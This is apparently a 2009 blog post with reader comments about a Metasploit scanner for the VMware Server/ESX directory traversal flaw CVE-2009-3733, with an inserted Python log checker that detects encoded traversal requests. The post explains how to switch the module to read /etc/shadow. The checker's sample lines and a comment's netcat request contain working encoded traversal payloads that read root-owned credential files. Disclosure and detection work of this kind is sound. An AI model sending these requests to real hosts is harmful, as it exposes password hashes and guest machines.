Since everyone else is releasing code to check for/exploit the VMware Server/ESX/ESXi directory traversal vulnerability, I pushed my checker module up to the Metasploit trunk as an auxiliary scanner module.
If you just want to download a full guest host, check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl
or the
nmap script -- http://www.skullsecurity.org/blog/?p=436
I don't feel like re-implementing it, and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality, write it or use the above tools. GuestStealer works great.
Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html
The module:
The module is simple enough. By default it checks for:
FILE /etc/vmware/hostd/vmInventory.xml
If it receives a 200 for the traversal string plus the file, it reports the host as vulnerable. If you want to see the output of the file, you can uncomment the following line in the code:
#print_status("Output Of Requested File:\n#{res.body}")
reload the module, then change the file to what you want (example: set FILE /etc/shadow).
Since VMware runs as root, you pretty much have access to anything on the file system.
Thanks,
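For the detection side of this same bug, here is a small log checker I am adding as an example (not code from the post or from Metasploit): it percent-decodes request paths, including double-encoded ones, flags any request that still carries a ".." segment after decoding, and notes whether the server answered 200. The log lines and the log format are constructed for the example; real hostd/access log formats may differ.

```python
"""Flag encoded directory-traversal requests against the VMware management port.

Added example, not from the original post or the Metasploit module. The log
format and the sample lines below are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real captures): client, request line, status.
SAMPLE_LOG = """\
192.0.2.10 "GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml HTTP/1.1" 200
192.0.2.10 "GET /sdk/%252E%252E/%252E%252E/etc/shadow HTTP/1.1" 200
192.0.2.11 "GET /sdk/vimService.wsdl HTTP/1.1" 200
192.0.2.12 "GET /ui/ HTTP/1.1" 200
"""

# Assumed (constructed) log layout: "<src> \"<method> <path> <proto>\" <status>".
LINE_RE = re.compile(r'^(?P<src>\S+) "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$')


def decode_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %2E%2E and %252E%252E both end up as '..'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_traversal(path: str) -> bool:
    """True when the decoded path contains a '..' segment.

    Normal clients resolve '..' before sending, so its presence on the wire
    (in any encoding) is worth an alert on its own.
    """
    return ".." in decode_path(path).split("/")


def find_traversal(log_text: str) -> list[dict]:
    """One record per traversal request; 'served' marks a 200 that likely leaked the file."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if has_traversal(m["path"]):
            hits.append({"src": m["src"], "path": decode_path(m["path"]),
                         "status": int(m["status"]), "served": m["status"] == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```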
Working great against VMware Server version 2.0.1 on my local machine.
I tried simply using netcat
#nc -vv -n 127.0.0.1 8222
GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow
and it spat out my shadow file.
Just curious to know how you remain so much "updated" with metasploit :)